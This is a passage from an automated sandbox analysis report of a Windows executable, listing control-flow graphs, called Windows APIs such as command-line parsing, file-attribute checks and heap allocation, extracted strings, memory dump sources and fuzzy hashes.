                                  • Instruction Fuzzy Hash: 22019272A01249BBDB11CBD5C8C9BADB3ACEB48365F544065E901E7202DB789E01C6A4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 256 7e25d3-7e265b memset * 2 CommandLineToArgvW 257 7e2891-7e28a1 call 7e32b0 256->257 258 7e2661-7e2667 256->258 259 7e287d-7e2886 LocalFree 258->259 260 7e266d-7e2674 258->260 259->257 263 7e2888-7e2890 259->263 264 7e2676-7e267e 260->264 265 7e2683-7e269e StrCmpNIW 260->265 263->257 264->259 266 7e26f0-7e26f9 265->266 267 7e26a0-7e26a7 265->267 269 7e26fb-7e271c call 7e1a60 PathFindExtensionW 266->269 270 7e2757-7e275f 266->270 268 7e26aa-7e26b3 267->268 268->268 271 7e26b5-7e26b9 268->271 284 7e271e-7e272e StrCmpIW 269->284 272 7e2761-7e2770 StrCmpIW 270->272 274 7e26bb-7e26bd 271->274 275 7e2736-7e273c 271->275 276 7e2785-7e27a2 272->276 277 7e2772-7e2781 272->277 279 7e26cf-7e26dd 274->279 280 7e26bf-7e26cd call 7e1b57 274->280 285 7e2877 275->285 282 7e27a8-7e27b0 276->282 283 7e2873-7e2875 276->283 277->272 281 7e2783 277->281 279->259 289 7e26e3-7e26eb 279->289 280->279 281->275 287 7e27c5-7e27e3 call 7e1a60 GetFileAttributesW 282->287 288 7e27b2-7e27b5 282->288 283->285 290 7e2730-7e2734 284->290 291 7e2741-7e2751 284->291 285->259 300 7e27e5-7e27ec 287->300 301 7e2833-7e2835 287->301 293 7e2818-7e2825 288->293 294 7e27b7-7e27be 288->294 289->259 290->275 290->284 291->270 296 7e282c-7e2831 293->296 297 7e2827-7e282a 293->297 294->293 298 7e27c0 294->298 296->259 297->287 298->287 304 7e27ee-7e27fd PathRemoveFileSpecW 300->304 305 7e2811-7e2816 300->305 302 7e2837-7e283e 301->302 303 7e2840-7e2848 301->303 302->303 302->305 306 7e284b-7e2854 303->306 304->305 307 7e27ff-7e280f GetFileAttributesW 304->307 305->285 306->306 308 7e2856-7e2871 call 7e2b60 306->308 307->301 307->305 308->283 308->285
                                  APIs
                                  • memset.MSVCRT ref: 007E261B
                                  • memset.MSVCRT ref: 007E2633
                                  • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 007E264D
                                  • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 007E268D
                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 007E287E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: memset$ArgvCommandFreeLineLocal
                                  • String ID: /LDAP:
                                  • API String ID: 439219084-3282177907
                                  • Opcode ID: 2e2ee4d2bc82a385b8fd1da9ba77710b36d3e87966c42bc70224376b0ef9f0c5
                                  • Instruction ID: b69856df6e253131ebdfb810c4b7c9da47e7026341efff229d5072d594eb769d
                                  • Opcode Fuzzy Hash: 2e2ee4d2bc82a385b8fd1da9ba77710b36d3e87966c42bc70224376b0ef9f0c5
                                  • Instruction Fuzzy Hash: B581C771A022989BCB24DF25DC89BA9B3B9FF1C310F1441A9E50AD7252D7389E82CF54

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 311 7e2a7e-7e2a8c 312 7e2a8e-7e2a90 311->312 313 7e2a95-7e2aa1 311->313 314 7e2b5b-7e2b5d 312->314 315 7e2aaa 313->315 316 7e2aa3 313->316 317 7e2aac-7e2ab3 315->317 316->317 318 7e2aa5-7e2aa8 316->318 319 7e2ab7-7e2abb 317->319 320 7e2ab5 317->320 318->315 318->317 321 7e2b54 319->321 322 7e2ac1-7e2ac3 319->322 320->319 323 7e2b59-7e2b5a 321->323 322->321 324 7e2ac9-7e2add GetProcessHeap HeapAlloc 322->324 323->314 324->321 325 7e2adf-7e2ae3 324->325 326 7e2b1c-7e2b22 325->326 327 7e2ae5-7e2afd memcpy 325->327 328 7e2b2d-7e2b31 326->328 329 7e2b24-7e2b2b 326->329 330 7e2aff-7e2b06 327->330 331 7e2b0b-7e2b0f 327->331 332 7e2b44-7e2b52 328->332 333 7e2b33-7e2b3e GetProcessHeap HeapFree 328->333 329->328 329->329 330->330 334 7e2b08 330->334 331->328 335 7e2b11-7e2b18 331->335 332->323 333->332 334->331 335->335 336 7e2b1a 335->336 336->328
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(~,?,007E2BA4,?,?,8000FFFF,00000000,?,?,?,007E286D,?), ref: 007E2ACC
                                  • HeapAlloc.KERNEL32(00000000,?,007E2BA4,?,?,8000FFFF,00000000,?,?,?,007E286D,?,?), ref: 007E2AD3
                                  • memcpy.MSVCRT ref: 007E2AEB
                                  • GetProcessHeap.KERNEL32(00000000,?,?,007E2BA4,?,?,8000FFFF,00000000,?,?,?,007E286D,?,?), ref: 007E2B37
                                  • HeapFree.KERNEL32(00000000,?,007E2BA4,?,?,8000FFFF,00000000,?,?,?,007E286D,?,?), ref: 007E2B3E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFreememcpy
                                  • String ID: m(~
                                  • API String ID: 3405790324-1437496304
                                  • Opcode ID: bf8a3b40ae0d2ea3eee82fffe05c6ef49a38e3c52c832864b605757d4fcf0064
                                  • Instruction ID: 6f335e43f0f3d0b8dc111026c0a1215dda21fd7d598a51f8488e72b5f8998139
                                  • Opcode Fuzzy Hash: bf8a3b40ae0d2ea3eee82fffe05c6ef49a38e3c52c832864b605757d4fcf0064
                                  • Instruction Fuzzy Hash: 232107B1A026D29BDB255E2E9884B15BB9EBB0C314F108125E9158F292FB7CDC52C7D0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 337 7e3675-7e3698 338 7e369e-7e36eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 337->338 339 7e369a-7e369c 337->339 341 7e36ed-7e36f3 338->341 342 7e36f5-7e36fa 338->342 339->338 340 7e3702-7e370c 339->340 341->342 343 7e36fc 341->343 342->343 343->340
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007E36A2
                                  • GetCurrentProcessId.KERNEL32 ref: 007E36B1
                                  • GetCurrentThreadId.KERNEL32 ref: 007E36BA
                                  • GetTickCount.KERNEL32 ref: 007E36C3
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 007E36D8
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 7fdc3f87a26cd6c83a3264ee28b85abe6e128488a35182e482e5940b161a9d21
                                  • Instruction ID: a13af62109f460f5e059d9fbf239f420a59c2593fd44fb4b561cbebb5b8a564b
                                  • Opcode Fuzzy Hash: 7fdc3f87a26cd6c83a3264ee28b85abe6e128488a35182e482e5940b161a9d21
                                  • Instruction Fuzzy Hash: D711EC71D02648EBCB10DFB9EA8869EBBF4FF5C355F5184A5E501EB250E6389B008B44

                                  Control-flow Graph

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007E33F6,`@~), ref: 007E32C7
                                  • UnhandledExceptionFilter.KERNEL32(007E33F6,?,007E33F6,`@~), ref: 007E32D0
                                  • GetCurrentProcess.KERNEL32(C0000409,?,007E33F6,`@~), ref: 007E32DB
                                  • TerminateProcess.KERNEL32(00000000,?,007E33F6,`@~), ref: 007E32E2
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                  • String ID:
                                  • API String ID: 3231755760-0
                                  • Opcode ID: a29708d481392324a5b7c7818aef3e5f84d732bb62da8f0b54270be44690d03d
                                  • Instruction ID: d43a94798d50b4d88cc5f76a8560b9632a8167a7d26dfbd7bf6b7151449ef478
                                  • Opcode Fuzzy Hash: a29708d481392324a5b7c7818aef3e5f84d732bb62da8f0b54270be44690d03d
                                  • Instruction Fuzzy Hash: BFD0C93200158CAFDB002BF5EC4CE493E28FB8C32AF048400F30DCE020CA3944118BA9
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 007E3455
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 8a904035e5aa1762118391a71e44b106d12d829855a20629eb23d60d43d894d5
                                  • Instruction ID: 98ed998ce125ffcfd0794d7b47e9b18ba65d256c6ffc3df6b74ae0a3ea4aac8d
                                  • Opcode Fuzzy Hash: 8a904035e5aa1762118391a71e44b106d12d829855a20629eb23d60d43d894d5
                                  • Instruction Fuzzy Hash: 089002A03575C446460217755C5E51529916A8D70F7824490B005CE098DA5842015956
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5~
                                  • API String ID: 0-4055697937
                                  • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                  • Instruction ID: 9c2131ed8d29d33ca908f992f65a42a079f4a996344cbd620b585686c7602962
                                  • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                  • Instruction Fuzzy Hash: 9DF0A7337052505B8B448B5FDC8497EB3DADAC873471A806AE50887302EA38ED528294

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 007E34D8: GetModuleHandleW.KERNEL32(00000000), ref: 007E34DF
                                  • __set_app_type.MSVCRT ref: 007E2F92
                                  • __p__fmode.MSVCRT ref: 007E2FA8
                                  • __p__commode.MSVCRT ref: 007E2FB6
                                  • __setusermatherr.MSVCRT ref: 007E2FD7
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.879003034396.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000010.00000002.879002995876.00000000007E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000010.00000002.879003077019.00000000007FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7e0000_GrOcCQC.jbxd
                                  Similarity
                                  • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                  • String ID:
                                  • API String ID: 1632413811-0
                                  • Opcode ID: f34f5f8569c830c4da93f142878c8b01a085f47109bdaa3a41b49712c8c258e2
                                  • Instruction ID: e0e4a26291b0fa5928602a19e4bca3f66d7248ae94fde8abb52a91594139e866
                                  • Opcode Fuzzy Hash: f34f5f8569c830c4da93f142878c8b01a085f47109bdaa3a41b49712c8c258e2
                                  • Instruction Fuzzy Hash: E5F0F8B09077C4CFC7286B31ACCE6143BB0B70D325B108659E5629F2E1DB3D85508A18